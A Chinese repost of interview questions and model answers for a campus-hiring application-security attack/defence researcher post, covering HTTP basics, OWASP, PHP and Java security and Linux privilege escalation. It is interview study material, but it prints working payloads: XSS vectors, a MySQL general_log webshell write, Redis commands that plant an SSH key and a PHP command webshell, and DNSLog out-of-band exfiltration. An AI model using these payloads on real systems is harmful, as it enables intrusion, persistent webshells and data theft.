2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)(题目+回答)

news2025/7/23 6:20:26

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[校招]攻防研究员(应用安全)

基础部分

1. HTTP状态码

2. HTTP请求方法及作用

3. 网络分层及协议

OWASP Top 10

1. XSS代码执行方式

2. XSS常用标签及绕过

3. HttpOnly的作用及绕过

4. 判断SQL注入存在

5. 无回显注入处理

6. MySQL延时注入其他姿势

7. DNSLog原理

8. 单引号被拦截绕过

9. MySQL写Shell的其他方式

10. Redis利用命令

11. SSRF利用

PHP安全

1. 审计流程

2. 命令执行函数

3. 文件上传函数

4. 代码执行函数

5. Vendor目录作用

6. PHPUnit漏洞

7. 无文件Shell实现

Java安全

1. 通用漏洞组合利用

2. 命令执行函数

3. 框架审计重点

4. 审计流程与关注点

5. Tomcat回显构造

6. 内存马实现

其他

1. POC/EXP开发心得

2. Linux提权姿势

3. 渗透关注文件

4. Dirty Cow时间及修复

5. 未提及的擅长点

 匿名[校招]攻防研究员(应用安全)

### 基础

1. http状态码,502,503,501
2. http请求方式及各自作用
3. 计算机网络的分层及分别有哪些协议

### **owasp top 10**

1. xss如何执行代码
2. xss常用哪些标签
3. http only
4. 怎样判断是否存在注入
5. sql注入无回显怎么办
6. 延时注入除了sleep的其他姿势(mysql)
7. dnslog的实现原理
8. sql注入,单引号被拦截,如何绕过
9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell
10. redis的利用,如何shell,相关命令
11. ssrf的原理即后利用,怎么执行命令,常搭配使用的协议

### PHP安全相关

1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. vender目录
6. phpunit
7. php可以构造无文件shell吗

### **Java安全相关**

1. 挖过的通用洞,你会怎么利用(组合)
2. 命令的函数或包
3. java哪些框架,审过哪些框架,它们常出现的问题是什么
4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型
5. tomcat做回显
6. 内存马的实现

### **其他**

- 写poc/exp的经历和心得
- 复现的一些漏洞
- Linux 提权的姿势
- Linux下有哪些文件进行渗透时比较关注的,及文件权限问题
- dirty cow 的时间及其修复版本(哪年后就没法用了)
- 你觉得什么是你自己比较擅长的而我没有问到的. 

### **小结**

这个岗位主要是搞漏洞挖掘和利用以及原理分析,Web方面就是JAVA和PHP的安全研究,比如JAVA下的流行框架,组件和服务器应用的安全问题。 没有问内网!!!

基础部分


1. HTTP状态码
  • 502(Bad Gateway):代理服务器从上游服务器接收到无效响应。常见于反向代理配置问题。
  • 503(Service Unavailable):服务器暂时无法处理请求,通常因维护或过载。
  • 501(Not Implemented):服务器不支持请求方法(如使用非标准的HTTP方法)。
2. HTTP请求方法及作用
  • GET:获取资源(无副作用)。
  • POST:提交数据(如表单)。
  • PUT:替换目标资源。
  • DELETE:删除资源。
  • HEAD:获取资源的元信息(不返回Body)。
  • OPTIONS:查询服务器支持的请求方法。
3. 网络分层及协议
  • 应用层:HTTP、FTP、DNS、SMTP。
  • 传输层:TCP(可靠传输)、UDP(低延迟)。
  • 网络层:IP、ICMP、ARP。
  • 数据链路层:Ethernet、PPP。
  • 物理层:物理介质规范。

OWASP Top 10


1. XSS代码执行方式
  • 反射型:攻击载荷通过URL参数注入并反射到页面执行。
  • 存储型:恶意脚本存储到数据库(如评论字段),用户访问时触发。
  • DOM型:由前端JavaScript操作DOM时触发(无需服务端参与)。
2. XSS常用标签及绕过
  • 经典标签<script>, <img src=1 onerror=alert(1)>, <svg/onload=...>
  • 事件属性onmouseover, onload, onerror
  • 编码绕过:Hex/Unicode编码(如javascript:alert(1)\x6A\x61...)。
3. HttpOnly的作用及绕过
  • 作用:防止JavaScript读取Cookie(缓解XSS窃取会话)。
  • 绕过:通过其他漏洞(如浏览器缓存劫持、中间人攻击)获取Cookie。
4. 判断SQL注入存在
  • 报错型:输入单引号触发数据库错误(如'You have an error...)。
  • 布尔盲注:构造AND 1=1AND 1=2观察页面差异。
  • 时间盲注:通过SLEEP()判断响应延迟。
5. 无回显注入处理
  • 外带数据:利用DNSLog或HTTP请求外传数据(如LOAD_FILE('\\\\xxx.dnslog.cn\\test') )。
  • 盲注攻击:布尔或时间盲注逐位提取数据。
6. MySQL延时注入其他姿势
  • Benchmark函数BENCHMARK(1000000, MD5('test'))
  • 条件运算IF(1=1, SLEEP(5), 0)
7. DNSLog原理
  • 实现:攻击者控制域名服务器,触发目标解析特定子域名(如payload.attacker.com ),通过DNS查询日志获取注入结果。
8. 单引号被拦截绕过
  • 宽字节注入:利用GBK编码转换(如%df%27 → 吞掉转义符)。
  • 数字型注入:无需引号的注入点(如id=1 AND 1=1)。
9. MySQL写Shell的其他方式
  • 日志文件写入
    sqlSET global general_log = 'ON'; SET global general_log_file = '/var/www/html/shell.php'; SELECT '<?php @eval($_POST[1]);?>'; 
  • 全局变量:利用secure_file_priv为空时直接写文件。
10. Redis利用命令
  • 写SSH密钥
    bashconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
  • 写Webshell
    bashconfig set dir /var/www/html set x "<?php system($_GET['cmd']);?>" save 
11. SSRF利用
  • 原理:服务端发起任意HTTP请求,攻击内网或本机服务。
  • 协议利用
    • File协议:读取本地文件(file:///etc/passwd)。
    • Gopher:构造TCP流量攻击内网Redis/MySQL。
  • 命令执行:结合CRLF注入或协议特性(如Redis的eval命令)。

PHP安全


1. 审计流程
  1. 入口点分析:定位用户输入($_GET$_POST)。
  2. 危险函数跟踪:如evalsystemunserialize
  3. 参数传递路径:追踪变量是否未过滤直接进入敏感函数。
2. 命令执行函数
  • 高危函数systemexecpassthrushell_exec、反引号(`)。
  • 间接执行popenproc_open
3. 文件上传函数
  • 核心函数move_uploaded_file(结合is_uploaded_file验证)。
  • 漏洞场景:未校验后缀/MIME类型,或黑名单不全(如.phar绕过)。
4. 代码执行函数
  • 动态执行evalassertcreate_function
  • 回调函数array_mapcall_user_func
5. Vendor目录作用
  • 用途:存放Composer依赖包,可能包含漏洞组件(如未更新的guzzlehttp)。
6. PHPUnit漏洞
  • 历史漏洞:CVE-2017-9841(远程代码执行,因eval-stdin.php 未删除)。
7. 无文件Shell实现
  • 内存驻留:通过反序列化漏洞加载恶意类(需unserialize可控)。
  • 伪协议:利用php://input执行代码(需allow_url_include=On)。

Java安全


1. 通用漏洞组合利用
  • 框架漏洞:Struts2 OGNL注入 + Fastjson反序列化。
  • 组件链:利用commons-collections链触发RCE。
2. 命令执行函数
  • 核心类Runtime.getRuntime().exec()ProcessBuilder
  • 反射调用:通过反射绕过黑名单检测。
3. 框架审计重点
  • Spring:SPEL表达式注入(CVE-2022-22963)、未授权端点。
  • Hibernate:HQL注入(非预编译查询)。
  • Fastjson:反序列化漏洞(利用AutoType特性)。
4. 审计流程与关注点
  • 入口点:HTTP请求处理、RPC接口、JSON/XML解析。
  • 擅长方向:反序列化链构造、表达式注入、权限绕过逻辑。
5. Tomcat回显构造
  • 线程注入:通过反射获取Response对象(如从ThreadLocal提取)。
  • 内存马适配:注入Filter或Servlet动态注册恶意逻辑。
6. 内存马实现
  • Filter型:插入恶意Filter到责任链头部。
  • Agent型:动态修改字节码(如利用javassist)。

其他


1. POC/EXP开发心得
  • 关键点:漏洞触发条件精准复现、兼容性处理(如版本差异)。
  • 案例:Fastjson反序列化EXP需构造特定Gadget链。
2. Linux提权姿势
  • 内核漏洞:Dirty Cow(CVE-2016-5195)、sudo权限滥用(CVE-2021-3156)。
  • SUID滥用:find、vim等可执行文件提权。
3. 渗透关注文件
  • 敏感文件/etc/passwd/etc/shadow、SSH密钥(~/.ssh/id_rsa)。
  • 权限问题:全局可写文件(find / -perm -o=w)。
4. Dirty Cow时间及修复
  • 时间:2016年10月披露,影响Linux内核≤4.8.3。
  • 修复版本:4.8.3以上内核已修补。
5. 未提及的擅长点
  • 反序列化漏洞链分析:Java/PHP反序列化利用链构造与调试。
  • 框架组件0day挖掘:基于源码分析或黑盒Fuzz。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2397573.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

碰一碰发视频系统--基于H5场景开发

#碰一碰发视频# 旨在构建一个基于移动网页&#xff08;H5&#xff09;的视频“碰传”交互系统&#xff0c;提供类似华为/苹果设备 NFC 轻碰分享的便捷体验。其核心技术依赖于移动端可用的近场通信&#xff08;NFC 或 H5 相关 API&#xff09;和可靠的媒体数据传输方案。实现细节…

MagicAnimate 论文解读:引入时间一致性的视频人物动画生成方法

1. 前言/动机 问题&#xff1a;现有动画生成方法缺乏对时间信息的建模&#xff0c;常常出现时间一致性差的问题 描述&#xff1a; 现有的动画生成方法通常采用帧变形&#xff08;frame-warping&#xff09;技术&#xff0c;将参考图像变形以匹配目标动作。尽管这类方法能生成较…

数据结构:递归(Recursion)

目录 示例1&#xff1a;先打印&#xff0c;再递归 示例2&#xff1a;先递归&#xff0c;再打印 递归的两个阶段 递归是如何使用栈内存 复杂度分析 递归中的静态变量 内存结构图解 递归&#xff1a;函数调用自己 必须有判断条件来使递归继续或停止 我们现在通过这两个示…

Cesium快速入门到精通系列教程一:打造第一个Cesium应用

一、打造第一个Cesium应用 1、官方渠道下载Cesium&#xff08;可选择历史版本&#xff09; ​​GitHub Releases页面​​&#xff1a;https://github.com/CesiumGS/cesium/releases 访问 Cesium GitHub Releases&#xff0c;此处列出了所有正式发布的版本。 通过标签&#…

力扣题解106:从中序与后序遍历序列构造二叉树

一、题目内容 题目要求根据二叉树的中序遍历序列和后序遍历序列来重建二叉树。具体来说&#xff0c;我们需要利用中序遍历序列和后序遍历序列的特点&#xff0c;通过递归的方法逐步构建出完整的二叉树。 中序遍历序列的特点是&#xff1a;左子树 -> 根节点 -> 右子树。后…

学习STC51单片机25(芯片为STC89C52RCRC)

每日一言 生活就像弹簧&#xff0c;你弱它就强&#xff0c;你强它就弱&#xff0c;别轻易认输。 ESP8266作为路由器模式&#xff08;AP模式&#xff09;也就是在局域网内可以有服务器的作用 那么我们需要将pc作为设备进行连接ESP的发射出来的WIFE 叫做这个AI啥的 也有可能叫做…

宁夏农业科技:创新引领,赋能现代农业新篇章

在广袤的宁夏大地上&#xff0c;农业科技如同一股强劲的春风&#xff0c;吹拂着每一寸土地&#xff0c;为宁夏的农业发展注入了新的活力与希望。近年来&#xff0c;宁夏农业科技以其独特的创新力和实践力&#xff0c;不断推动着现代农业的转型升级&#xff0c;让这片古老的土地…

Accelerate 2025北亚巡展正式启航!AI智御全球·引领安全新时代

近日&#xff0c;网络安全行业年度盛会Accelerate 2025北亚巡展正式在深圳启航&#xff01;智库专家、产业领袖及Fortinet高管、产品技术团队和300余位行业客户齐聚一堂&#xff0c;围绕“AI智御全球引领安全新时代”主题&#xff0c;共同探讨AI时代网络安全新范式。大会聚焦三…

005学生心理咨询评估系统技术解析:搭建科学心理评估平台

学生心理咨询评估系统技术解析&#xff1a;搭建科学心理评估平台 在心理健康教育日益受重视的当下&#xff0c;学生心理咨询评估系统成为了解学生心理状态的重要工具。该系统涵盖试卷管理、试题管理等核心模块&#xff0c;面向管理员和用户两类角色&#xff0c;通过前台展示与…

贪心算法应用:多重背包启发式问题详解

贪心算法应用&#xff1a;多重背包启发式问题详解 多重背包问题是经典的组合优化问题&#xff0c;也是贪心算法的重要应用场景。本文将全面深入地探讨Java中如何利用贪心算法解决多重背包问题。 多重背包问题定义 **多重背包问题(Multiple Knapsack Problem)**是背包问题的变…

【保姆级教程】PDF批量转图文笔记

如果你有一个PDF文档&#xff0c;然后你想把它发成图文笔记emmm&#xff0c;最好再加个水印&#xff0c;你会怎么做&#xff1f; 其实也不麻烦&#xff0c;打开PDF文档&#xff0c;挨个截图&#xff0c;然后打开PS一张一张图片拖进去&#xff0c;再把水印图片拖进去&#xff0…

数据库系统概论(十一)SQL 集合查询 超详细讲解(附带例题表格对比带你一步步掌握)

数据库系统概论&#xff08;十一&#xff09;SQL 集合查询 超详细讲解&#xff08;附带例题表格对比带你一步步掌握&#xff09; 前言一、什么是集合查询&#xff1f;二、集合操作的三种类型1. 并操作2. 交操作3. 差操作 三、使用集合查询的前提条件四、常见问题与注意事项五、…

clickhouse如何查看操作记录,从日志来查看写入是否成功

背景 插入表数据后&#xff0c;因为原本表中就有数据&#xff0c;一时间没想到怎么查看插入是否成功&#xff0c;因为对数据源没有很多的了解&#xff0c;这时候就想怎么查看下插入是否成功呢&#xff0c;于是就有了以下方法 具体方法 根据操作类型查找&#xff0c;比如inse…

5G-A:开启通信与行业变革的新时代

最近&#xff0c;不少细心的用户发现手机信号标识悄然发生了变化&#xff0c;从熟悉的 “5G” 变成了 “5G-A”。这一小小的改变&#xff0c;却蕴含着通信技术领域的重大升级&#xff0c;预示着一个全新的通信时代正在向我们走来。今天&#xff0c;就让我们深入了解一下 5G-A&a…

TDengine 集群运行监控

简介 为了确保集群稳定运行&#xff0c;TDengine 集成了多种监控指标收集机制&#xff0c;并通过 taosKeeper 进行汇总。taosKeeper 负责接收这些数据&#xff0c;并将其写入一个独立的 TDengine 实例中&#xff0c;该实例可以与被监控的 TDengine 集群保持独立。TDengine 中的…

uniapp路由跳转toolbar页面

需要阅读uview-ui的API文档 注意需要使用type参数设置后才起作用 另外route跳转的页面会覆盖toolbar工具栏 toConternt(aid) {console.log(aid:, aid)this.$u.route({// url: "pages/yzpg/detail",url: "pages/yzappl/index",// url: "pages/ind…

【linux】知识梳理

操作系统的分类 1. 桌⾯操作系统: Windows/macOS/Linux 2. 移动端操作系统: Android(安卓)/iOS(苹果) 3. 服务器操作系统: Linux/Windows Server 4. 嵌⼊式操作系统: Android(底层是 Linux) Liunx介绍 liunx系统:服务器端最常见的操作系统类型 发行版:Centos和Ubuntu 远程连接操…

NodeMediaEdge快速上手

NodeMediaEdge快速上手 简介 NodeMediaEdge是一款部署在监控摄像机网络前端中&#xff0c;拉取Onvif或者rtsp/rtmp/http视频流并使用rtmp/kmp推送到公网流媒体服务器的工具。 通过云平台协议注册到NodeMediaServer后&#xff0c;可以同NodeMediaServer结合使用。使用图形化的…

ChatOn:智能AI聊天助手,开启高效互动新时代

在当今快节奏的生活中&#xff0c;无论是工作、学习还是日常交流&#xff0c;我们常常需要快速获取信息、整理思路并高效完成任务。ChatOn 正是为满足这些需求而生&#xff0c;它基于先进的 ChatGPT 和 GPT-4o 技术&#xff0c;为用户提供市场上最优秀的中文 AI 聊天机器人。这…

基于Vue3.0的【Vis.js】库基本使用教程(002):图片知识图谱的基本构建和设置

文章目录 3、图片知识图谱3.1 初始化图片知识图谱3.2 修改节点形状3.3 修改节点背景颜色3.4 完整代码下载3、图片知识图谱 3.1 初始化图片知识图谱 1️⃣效果预览: 2️⃣关键代码: 给节点添加image属性: const nodes = ref([{id: 1,